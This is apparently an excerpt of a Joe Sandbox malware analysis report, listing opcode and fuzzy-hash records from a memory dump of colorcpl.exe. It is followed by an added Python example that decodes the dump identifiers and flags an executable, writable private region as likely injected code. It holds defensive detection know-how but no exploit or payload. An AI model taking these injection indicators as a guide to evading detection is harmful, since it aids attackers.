                                                                                                                                          • Opcode ID: 5107e0cfb543f32e6eefc515a8aae06aa4fa44691921ca494ba8692051fce212
                                                                                                                                          • Instruction ID: b09218f93e5c8e8470606f7b550a958fbc8086eca0baf6af3225edc7e5fbad7b
                                                                                                                                          • Opcode Fuzzy Hash: 5107e0cfb543f32e6eefc515a8aae06aa4fa44691921ca494ba8692051fce212
                                                                                                                                          • Instruction Fuzzy Hash: 10D02B328CD3706ACB2AD1147C08F837E999B44720F014874FE0897051E554CC91C2C8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                          • Instruction ID: 00fe3c6b7ec252ca949d23a0bf66683c0542e554f91ebd00869c37992724d739
                                                                                                                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                          • Instruction Fuzzy Hash: 89E0C23100DB20EFE7371F21DD08F5276A1FFA4B10F644929E4842B0A487B4AC81CB44
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dbd3a23a20b4df4276963f75e480f622cc54ca80e0a46841254514bfb17395cc
                                                                                                                                          • Instruction ID: 8fd47d63d3404951b50bd3462512ccbab22289ebe6cdcdf632756012323e8404
                                                                                                                                          • Opcode Fuzzy Hash: dbd3a23a20b4df4276963f75e480f622cc54ca80e0a46841254514bfb17395cc
                                                                                                                                          • Instruction Fuzzy Hash: 9EE08C32105A606BC312EA5DDD10F4A739AEFA4360F010221F1919B6D0CA64EC40C794
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                          • Instruction ID: 98f500642ec3d17c04c299058cf4884c3a200750a638b02cfa1b6da3a5bcc0ea
                                                                                                                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                          • Instruction Fuzzy Hash: 5BE08633115B1487C714DE14D511B62B7E4EF45720F05463EBA5347780C534E954C798
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
                                                                                                                                          • API String ID: 48624451-2819853543
                                                                                                                                          • Opcode ID: 21dd7947b8ab2f3a26a4736c99a8bde9c9eb15754ad4eccd278ce899108e56ac
                                                                                                                                          • Instruction ID: 4f8ed3db8b82f7f033fba3ced2b648aa7042b6eaec1598171c80ee2dd9c6ac4c
                                                                                                                                          • Opcode Fuzzy Hash: 21dd7947b8ab2f3a26a4736c99a8bde9c9eb15754ad4eccd278ce899108e56ac
                                                                                                                                          • Instruction Fuzzy Hash: CE218177A04319ABDB01DE69CD44ABE7BF9AF68744F444126E915E3201E771DA028BA0
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 9ca43d2a00d516b1480dd068a5e493f671f24562dc0fd7d97765197465e99e78
• Instruction ID: 09391e8a3371f46efe069589d437b1329ce4610d457cc4f05e5ed69fe373f2da
• Opcode Fuzzy Hash: 9ca43d2a00d516b1480dd068a5e493f671f24562dc0fd7d97765197465e99e78
• Instruction Fuzzy Hash: 13318473A04319AFCB11CF28CD44BEE77F8EF54614F900596ED49E3241EB70AA458BA0
Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 07f52f073430763c204e5c50f2f0c7e71a198d0eeba339748c1ee7e76c1f7dc4
• Instruction ID: ccdc9dc594b4821070a77fbb3d798aac0d534159528c12d383de8d5cad76cf08
• Opcode Fuzzy Hash: 07f52f073430763c204e5c50f2f0c7e71a198d0eeba339748c1ee7e76c1f7dc4
• Instruction Fuzzy Hash: 9F813971D04369DBDB328B54CD44BDAB7B4AF08714F0042EAEA19B7280E7709E80DFA1
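All three function records above come from the same memory dump, and the dump's identifiers carry the facts a triager wants before reading a single opcode: which process and snapshot it came from, where it was mapped, and how the region was protected. The example below is added here and is not part of the Joe Sandbox report or its tooling. The PID (0x0A = 10), snapshot index (2) and base address (0x226F0000) are corroborated by the snapshot file name hcaresult_10_2_226f0000_colorcpl.jbxd; reading the fifth and seventh dotted fields of the .sdmp name as the Windows MEMORY_BASIC_INFORMATION Protect and Type values is an assumption made here, based on the observed values 0x40 and 0x20000 being exactly PAGE_EXECUTE_READWRITE and MEM_PRIVATE. The injection heuristic at the end is the usual triage rule (writable and executable, not image-backed, yet containing a PE header), not a rule taken from the report.

```python
"""Decode Joe Sandbox memory-dump identifiers and flag likely injected regions.

Added example; not Joe Sandbox code. Field meanings beyond PID, snapshot
and base address are an assumption (see lead-in).
"""
import re

# Windows memory protection constants from winnt.h (low byte of Protect).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}

# Windows memory type constants from winnt.h.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: PID.Snapshot.Timestamp.Base.Protect.Field6.Type.Field8.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{8,16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
# Snapshot name as printed in the report: hcaresult_<pid>_<snapshot>_<base>_<process>.jbxd
JBXD_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-fA-F]+)_(.+)\.jbxd$")

# Identifiers taken verbatim from the report above.
SAMPLE_SDMP = "0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp"
SAMPLE_JBXD = "hcaresult_10_2_226f0000_colorcpl.jbxd"


def decode_protect(value):
    """Render a Protect value as PAGE_* name plus any modifier bits."""
    names = [PAGE_PROTECT.get(value & 0xFF, "UNKNOWN_0x%x" % (value & 0xFF))]
    names += [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join(names)


def parse_sdmp(name):
    """Split a .sdmp file name into its fields (assumed layout, see above)."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError("not a recognised .sdmp name: %r" % name)
    pid, snap, ts, base, protect, field6, mtype, field8 = m.groups()
    protect_v = int(protect, 16)
    type_v = int(mtype, 16)
    return {
        "pid": int(pid, 16),
        "snapshot": int(snap, 16),
        "timestamp_raw": ts,          # left undecoded; its encoding is not documented here
        "base": int(base, 16),
        "protect": decode_protect(protect_v),
        "writable": (protect_v & 0xFF) in WRITABLE,
        "executable": (protect_v & 0xFF) in EXECUTABLE,
        "type": MEM_TYPE.get(type_v, "UNKNOWN_0x%x" % type_v),
    }


def parse_jbxd(name):
    """Split an IDA-plugin snapshot name into PID, snapshot, base and process."""
    m = JBXD_RE.match(name)
    if not m:
        raise ValueError("not a recognised .jbxd name: %r" % name)
    pid, snap, base, process = m.groups()
    return {"pid": int(pid), "snapshot": int(snap), "base": int(base, 16), "process": process}


def consistent(sdmp, jbxd):
    """Cross-check that both identifiers describe the same region of the same process."""
    return all(sdmp[k] == jbxd[k] for k in ("pid", "snapshot", "base"))


def is_injected_code_candidate(sdmp, based_on_pe):
    """Triage rule: RWX, private (not backed by an image) and carrying a PE header."""
    return sdmp["writable"] and sdmp["executable"] and sdmp["type"] == "MEM_PRIVATE" and based_on_pe


if __name__ == "__main__":
    d = parse_sdmp(SAMPLE_SDMP)
    j = parse_jbxd(SAMPLE_JBXD)
    print(d, j, consistent(d, j), is_injected_code_candidate(d, based_on_pe=True))
```

For the dump referenced above this yields PID 10 (colorcpl.exe), an RWX (PAGE_EXECUTE_READWRITE) private region at 0x226F0000 and, with the report's "based on PE: true", a positive injected-code candidate. Any legitimately loaded module would instead appear as MEM_IMAGE with read-only or execute-read sections, so a mismatch here is worth more than the opcode hashes that follow it.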